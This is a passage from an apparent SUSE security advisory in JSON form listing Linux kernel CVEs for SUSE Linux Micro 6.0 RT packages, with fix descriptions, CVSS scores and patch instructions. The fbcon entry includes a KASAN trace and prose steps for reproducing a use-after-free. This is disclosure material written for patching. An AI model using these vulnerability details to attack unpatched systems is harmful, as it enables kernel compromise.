"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbcon: Set fb_display[i]-\u003emode to NULL when the mode is released\n\nRecently, we discovered the following issue through syzkaller:\n\nBUG: KASAN: slab-use-after-free in fb_mode_is_equal+0x285/0x2f0\nRead of size 4 at addr ff11000001b3c69c by task syz.xxx\n...\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xab/0xe0\n print_address_description.constprop.0+0x2c/0x390\n print_report+0xb9/0x280\n kasan_report+0xb8/0xf0\n fb_mode_is_equal+0x285/0x2f0\n fbcon_mode_deleted+0x129/0x180\n fb_set_var+0xe7f/0x11d0\n do_fb_ioctl+0x6a0/0x750\n fb_ioctl+0xe0/0x140\n __x64_sys_ioctl+0x193/0x210\n do_syscall_64+0x5f/0x9c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nBased on experimentation and analysis, during framebuffer unregistration,\nonly the memory of fb_info-\u003emodelist is freed, without setting the\ncorresponding fb_display[i]-\u003emode to NULL for the freed modes. This leads\nto UAF issues during subsequent accesses. Here\u0027s an example of reproduction\nsteps:\n1. With /dev/fb0 already registered in the system, load a kernel module\n to register a new device /dev/fb1;\n2. Set fb1\u0027s mode to the global fb_display[] array (via FBIOPUT_CON2FBMAP);\n3. Switch console from fb to VGA (to allow normal rmmod of the ko);\n4. Unload the kernel module, at this point fb1\u0027s modelist is freed, leaving\n a wild pointer in fb_display[];\n5. Trigger the bug via system calls through fb0 attempting to delete a mode\n from fb0.\n\nAdd a check in do_unregister_framebuffer(): if the mode to be freed exists\nin fb_display[], set the corresponding mode pointer to NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40323",
"url": "https://www.suse.com/security/cve/CVE-2025-40323"
},
{
"category": "external",
"summary": "SUSE Bug 1255094 for CVE-2025-40323",
"url": "https://bugzilla.suse.com/1255094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40323"
},
{
"cve": "CVE-2025-40324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: Fix crash in nfsd4_read_release()\n\nWhen tracing is enabled, the trace_nfsd_read_done trace point\ncrashes during the pynfs read.testNoFh test.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40324",
"url": "https://www.suse.com/security/cve/CVE-2025-40324"
},
{
"category": "external",
"summary": "SUSE Bug 1254791 for CVE-2025-40324",
"url": "https://bugzilla.suse.com/1254791"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40324"
},
{
"cve": "CVE-2025-40328",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40328"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential UAF in smb2_close_cached_fid()\n\nfind_or_create_cached_dir() could grab a new reference after kref_put()\nhad seen the refcount drop to zero but before cfid_list_lock is acquired\nin smb2_close_cached_fid(), leading to use-after-free.\n\nSwitch to kref_put_lock() so cfid_release() is called with\ncfid_list_lock held, closing that gap.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40328",
"url": "https://www.suse.com/security/cve/CVE-2025-40328"
},
{
"category": "external",
"summary": "SUSE Bug 1254624 for CVE-2025-40328",
"url": "https://bugzilla.suse.com/1254624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40328"
},
{
"cve": "CVE-2025-40329",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40329"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sched: Fix deadlock in drm_sched_entity_kill_jobs_cb\n\nThe Mesa issue referenced below pointed out a possible deadlock:\n\n[ 1231.611031] Possible interrupt unsafe locking scenario:\n\n[ 1231.611033] CPU0 CPU1\n[ 1231.611034] ---- ----\n[ 1231.611035] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611038] local_irq_disable();\n[ 1231.611039] lock(\u0026fence-\u003elock);\n[ 1231.611041] lock(\u0026xa-\u003exa_lock#17);\n[ 1231.611044] \u003cInterrupt\u003e\n[ 1231.611045] lock(\u0026fence-\u003elock);\n[ 1231.611047]\n *** DEADLOCK ***\n\nIn this example, CPU0 would be any function accessing job-\u003edependencies\nthrough the xa_* functions that don\u0027t disable interrupts (eg:\ndrm_sched_job_add_dependency(), drm_sched_entity_kill_jobs_cb()).\n\nCPU1 is executing drm_sched_entity_kill_jobs_cb() as a fence signalling\ncallback so in an interrupt context. It will deadlock when trying to\ngrab the xa_lock which is already held by CPU0.\n\nReplacing all xa_* usage by their xa_*_irq counterparts would fix\nthis issue, but Christian pointed out another issue: dma_fence_signal\ntakes fence.lock and so does dma_fence_add_callback.\n\n dma_fence_signal() // locks f1.lock\n -\u003e drm_sched_entity_kill_jobs_cb()\n -\u003e foreach dependencies\n -\u003e dma_fence_add_callback() // locks f2.lock\n\nThis will deadlock if f1 and f2 share the same spinlock.\n\nTo fix both issues, the code iterating on dependencies and re-arming them\nis moved out to drm_sched_entity_kill_jobs_work().\n\n[phasta: commit message nits]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40329",
"url": "https://www.suse.com/security/cve/CVE-2025-40329"
},
{
"category": "external",
"summary": "SUSE Bug 1254621 for CVE-2025-40329",
"url": "https://bugzilla.suse.com/1254621"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40329"
},
{
"cve": "CVE-2025-40331",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40331"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: Prevent TOCTOU out-of-bounds write\n\nFor the following path not holding the sock lock,\n\n sctp_diag_dump() -\u003e sctp_for_each_endpoint() -\u003e sctp_ep_dump()\n\nmake sure not to exceed bounds in case the address list has grown\nbetween buffer allocation (time-of-check) and write (time-of-use).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40331",
"url": "https://www.suse.com/security/cve/CVE-2025-40331"
},
{
"category": "external",
"summary": "SUSE Bug 1254615 for CVE-2025-40331",
"url": "https://bugzilla.suse.com/1254615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40331"
},
{
"cve": "CVE-2025-40337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: Correctly handle Rx checksum offload errors\n\nThe stmmac_rx function would previously set skb-\u003eip_summed to\nCHECKSUM_UNNECESSARY if hardware checksum offload (CoE) was enabled\nand the packet was of a known IP ethertype.\n\nHowever, this logic failed to check if the hardware had actually\nreported a checksum error. The hardware status, indicating a header or\npayload checksum failure, was being ignored at this stage. This could\ncause corrupt packets to be passed up the network stack as valid.\n\nThis patch corrects the logic by checking the `csum_none` status flag,\nwhich is set when the hardware reports a checksum error. If this flag\nis set, skb-\u003eip_summed is now correctly set to CHECKSUM_NONE,\nensuring the kernel\u0027s network stack will perform its own validation and\nproperly handle the corrupt packet.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40337",
"url": "https://www.suse.com/security/cve/CVE-2025-40337"
},
{
"category": "external",
"summary": "SUSE Bug 1255081 for CVE-2025-40337",
"url": "https://bugzilla.suse.com/1255081"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40337"
},
{
"cve": "CVE-2025-40338",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40338"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: Intel: avs: Do not share the name pointer between components\n\nBy sharing \u0027name\u0027 directly, tearing down components may lead to\nuse-after-free errors. Duplicate the name to avoid that.\n\nAt the same time, update the order of operations - since commit\ncee28113db17 (\"ASoC: dmaengine_pcm: Allow passing component name via\nconfig\") the framework does not override component-\u003ename if set before\ninvoking the initializer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40338",
"url": "https://www.suse.com/security/cve/CVE-2025-40338"
},
{
"category": "external",
"summary": "SUSE Bug 1255273 for CVE-2025-40338",
"url": "https://bugzilla.suse.com/1255273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40338"
},
{
"cve": "CVE-2025-40339",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40339"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: fix nullptr err of vm_handle_moved\n\nIf a amdgpu_bo_va is fpriv-\u003eprt_va, the bo of this one is always NULL.\nSo, such kind of amdgpu_bo_va should be updated separately before\namdgpu_vm_handle_moved.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40339",
"url": "https://www.suse.com/security/cve/CVE-2025-40339"
},
{
"category": "external",
"summary": "SUSE Bug 1255428 for CVE-2025-40339",
"url": "https://bugzilla.suse.com/1255428"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40339"
},
{
"cve": "CVE-2025-40342",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40342"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-fc: use lock accessing port_state and rport state\n\nnvme_fc_unregister_remote removes the remote port on a lport object at\nany point in time when there is no active association. This races with\nwith the reconnect logic, because nvme_fc_create_association is not\ntaking a lock to check the port_state and atomically increase the\nactive count on the rport.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40342",
"url": "https://www.suse.com/security/cve/CVE-2025-40342"
},
{
"category": "external",
"summary": "SUSE Bug 1255274 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "external",
"summary": "SUSE Bug 1255275 for CVE-2025-40342",
"url": "https://bugzilla.suse.com/1255275"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40342"
},
{
"cve": "CVE-2025-40343",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40343"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvmet-fc: avoid scheduling association deletion twice\n\nWhen forcefully shutting down a port via the configfs interface,\nnvmet_port_subsys_drop_link() first calls nvmet_port_del_ctrls() and\nthen nvmet_disable_port(). Both functions will eventually schedule all\nremaining associations for deletion.\n\nThe current implementation checks whether an association is about to be\nremoved, but only after the work item has already been scheduled. As a\nresult, it is possible for the first scheduled work item to free all\nresources, and then for the same work item to be scheduled again for\ndeletion.\n\nBecause the association list is an RCU list, it is not possible to take\na lock and remove the list entry directly, so it cannot be looked up\nagain. Instead, a flag (terminating) must be used to determine whether\nthe association is already in the process of being deleted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40343",
"url": "https://www.suse.com/security/cve/CVE-2025-40343"
},
{
"category": "external",
"summary": "SUSE Bug 1255276 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "external",
"summary": "SUSE Bug 1255278 for CVE-2025-40343",
"url": "https://bugzilla.suse.com/1255278"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40343"
},
{
"cve": "CVE-2025-40345",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40345"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: storage: sddr55: Reject out-of-bound new_pba\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nnew_pba comes from the status packet returned after each write.\nA bogus device could report values beyond the block count derived\nfrom info-\u003ecapacity, letting the driver walk off the end of\npba_to_lba[] and corrupt heap memory.\n\nReject PBAs that exceed the computed block count and fail the\ntransfer so we avoid touching out-of-range mapping entries.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40345",
"url": "https://www.suse.com/security/cve/CVE-2025-40345"
},
{
"category": "external",
"summary": "SUSE Bug 1255279 for CVE-2025-40345",
"url": "https://bugzilla.suse.com/1255279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40345"
},
{
"cve": "CVE-2025-40346",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40346"
}
],
"notes": [
{
"category": "general",
